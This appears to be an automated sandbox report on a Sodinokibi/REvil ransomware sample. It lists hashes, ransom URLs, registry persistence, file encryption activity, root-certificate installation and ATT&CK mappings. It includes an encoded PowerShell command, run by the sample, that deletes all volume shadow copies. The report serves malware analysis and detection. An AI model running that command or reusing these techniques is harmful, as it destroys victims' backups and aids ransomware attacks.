Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
02-06-2024 08:44
Static task
static1
Behavioral task
behavioral1
Sample
8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe
-
Size
166KB
-
MD5
8d7eaf2d466b138f7d3a12d17a1e3126
-
SHA1
f75aee8361cfff77fdd045c32769e385d3e8f5df
-
SHA256
64f3d2db7a782fef79f46763d4ee2f83de2d656ba5813e3b3d873c17dae3ca2e
-
SHA512
eb28b302f0a858e636aca5a37897102af085cda436f15ead69761edcaa9275d6372ce1cf1164a45bebaeb68b8022202e0290d8cd0ef1b195f518fada6d2ce18b
-
SSDEEP
3072:EJMawtnGqtWoKeZC62aoNUSnc6udZxnXa1:+w9vteQJYUocFdZF
Malware Config
Extracted
C:\Users\2a1d2c-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3757EB65624F59B7
http://decryptor.cc/3757EB65624F59B7
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\oXnEn2JlQT = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe" 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe -
Drops desktop.ini file(s) 27 IoCs
description ioc Process File opened for modification \??\c:\users\admin\desktop\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\pictures\saved pictures\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\3d objects\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\public\accountpictures\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\favorites\links\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\public\music\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\pictures\camera roll\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\documents\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\links\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\searches\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\public\desktop\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\public\downloads\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files (x86)\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\contacts\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\onedrive\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\public\libraries\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\public\pictures\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\public\documents\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\saved games\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\public\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\public\videos\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\downloads\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\favorites\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\music\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\pictures\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\users\admin\videos\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\R: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\S: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\W: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\D: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\H: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\I: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\M: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\V: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\F: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\E: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\P: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\U: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\A: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\B: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\L: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\Z: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\G: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\J: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\T: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\N: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\O: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\Y: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\K: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened (read-only) \??\X: 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9o6d1f.bmp" 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe -
Drops file in Program Files directory 34 IoCs
description ioc Process File opened for modification \??\c:\program files\WatchLimit.m3u 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\DebugBackup.png 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\GroupSwitch.wvx 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\MeasureRegister.aif 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\UnpublishAdd.wav 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\OpenSelect.rm 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\UndoExpand.edrwx 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\EnterResolve.pps 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\LimitTrace.cr2 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\MountOpen.xla 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\DisableSwitch.pub 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\SearchResolve.avi 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\HideExpand.vbs 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\ProtectSend.aifc 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files (x86)\desktop.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\RegisterStart.docx 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\ResizeRepair.jfif 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\UnprotectUnblock.ini 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\BlockUninstall.au3 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\DisconnectTest.vsw 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\NewConvertTo.pptx 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\OpenUse.php 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\ReceiveRead.xlsb 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\RegisterUnlock.vstx 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File created \??\c:\program files\2a1d2c-readme.txt 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\ExitPublish.asf 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\JoinRegister.MTS 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\PopDeny.html 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\SetUpdate.potx 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File created \??\c:\program files (x86)\2a1d2c-readme.txt 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\ConnectSubmit.ADT 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\PingCopy.cfg 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe File opened for modification \??\c:\program files\RestoreBackup.mhtml 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\151682F5218C0A511C28F4060A73B9CA78CE9A53 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\151682F5218C0A511C28F4060A73B9CA78CE9A53\Blob = 030000000100000014000000151682f5218c0a511c28f4060a73b9ca78ce9a531400000001000000140000007c4296aede4b483bfa92f89e8ccf6d8ba972379504000000010000001000000029f1c1b26d92e893b6e6852ab708cce10f00000001000000200000005aef843ffcf2ec7055f504a162f229f8391c370ff3a6163d2db3f3d604d622be19000000010000001000000070d4f0bec2078234214bd651643b02405c0000000100000004000000800100001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da62000000001000000640400003082046030820248a0030201020210079e492886376fd40848c23fc631e463300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3230303930343030303030305a170d3235303931353136303030305a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f742058323076301006072a8648ce3d020106052b8104002203620004cd9bd59f80830aec094af3164a3e5ccf77acde67050d1d07b6dc16fb5a8b14dbe27160c4ba459511898eea06dff72a161ca4b9c5c532e003e01e8218388bd745d80a6a6ee60077fb02517d22d80a6e9a5b77dff0fa41ec39dc75ca68070c1feaa381e53081e2300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604147c4296aede4b483bfa92f89e8ccf6d8ba9723795301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f30220603551d20041b30193008060667810c010201300d060b2b0601040182df13010101300d06092a864886f70d01010b050003820201001b7f252b907a0876007718e1c32e8a364c417ebf174be330d75b0c7e9c96986f7bb068c02444cce2f2fcd1eadbd29f01f9174d0c9d55fda5ad6dd22f3f4b72c02eae73c7251657c23e15ade031d10a84846c6278423122461aed7a40bf9716814477ca6c7b5d215c07f2119121bfe12fc2ef6efd0520e4b4f779f32dbb372af0c6b1acac51f51fb35a1e66ce580718387f71a93c83bad7bc829e9a760f9eb029fdcbf38907481bfeab932e14210d5faf8eb754ab5d0ed45b4c71d092ea3da3369b7c1fe03b55b9d85353cc8366bb4adc810600188bf4b3d748b11341b9c4b69ecf2c778e42200b807e9fc5ab48dbbc6f048d6c4629020d708a1df11273b64624429e2a1718e3acc798c272cc6d2d766ddd2c2b2696a5cf21081be5da2fcbef9f7393aef8365f478f9728ceabe29826988bfdee28322229ed4c9509c420fa07e1862c44f68147c0e46232ed1dd83c488896c35e91b6af7b59a4eee3869cc78858ca282a66559b8580b91dd8402bc91c133ca9ebde99c21640f6f5a4ae2a256c52bac7044cb432bbfc385ca00c617b57ec774e50cfaf06a20f378ce10ed2d32f1abd9c713ecce1f8d1a8a3bd04f619c0f986aff50e1aaa956befca47714b631c4d96db55230a9d0f8175a0e640f56446036ecefa6a7d06eca4340674da53d8b9b8c6237da9f82a2da482a62e2d11cae6cd31587985e6721ca79fd34cd066d0a7bb 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4524 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe 4524 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe 2708 powershell.exe 2708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4524 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeBackupPrivilege 4416 vssvc.exe Token: SeRestorePrivilege 4416 vssvc.exe Token: SeAuditPrivilege 4416 vssvc.exe Token: SeTakeOwnershipPrivilege 4524 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4524 wrote to memory of 2708 4524 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe 89 PID 4524 wrote to memory of 2708 4524 8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe 89 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe"1⤵
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:212
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4416
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
3Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD5a33cee6edaef4cc2298ccede5fcd8d62
SHA1584e227ae50dc69989f00f5a6bffad213642f501
SHA25663339b46248e0f9e3cd223d11b06d1aa8608440dac0d1b5e57b3ef383094e784
SHA5125ae9296061dc2296405b404ebffcaf0514d286213e776ff0abfe840a1367136c4921149a8cc13ccacd1881d8939103e2a4563b36f66d3b1438e43902adc5d28b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82